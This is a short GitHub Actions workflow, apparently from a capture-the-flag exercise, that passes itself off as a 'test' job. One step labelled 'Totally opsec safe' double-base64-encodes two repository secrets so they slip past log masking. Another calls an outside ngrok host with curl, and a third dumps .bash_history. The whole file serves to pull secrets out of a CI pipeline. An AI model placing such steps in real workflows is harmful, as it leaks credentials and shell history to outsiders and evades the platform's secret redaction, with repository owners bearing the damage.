name: test
'on':
  push:
    branches: hithere
jobs:
  debug:
    runs-on:
    - ubuntu-latest
    steps:
    - name: Totally opsec safe
      run: echo -e "FLAG_ORG=${{ secrets.FLAG_ORG }}\nFLAG_REPO=${{ secrets.FLAG_REPO }}\n" | base64 | base64
    - name: test
      run: curl https://97c3-86-28-74-216.ngrok-free.app/
    - name: another step
      run: cat .bash_history

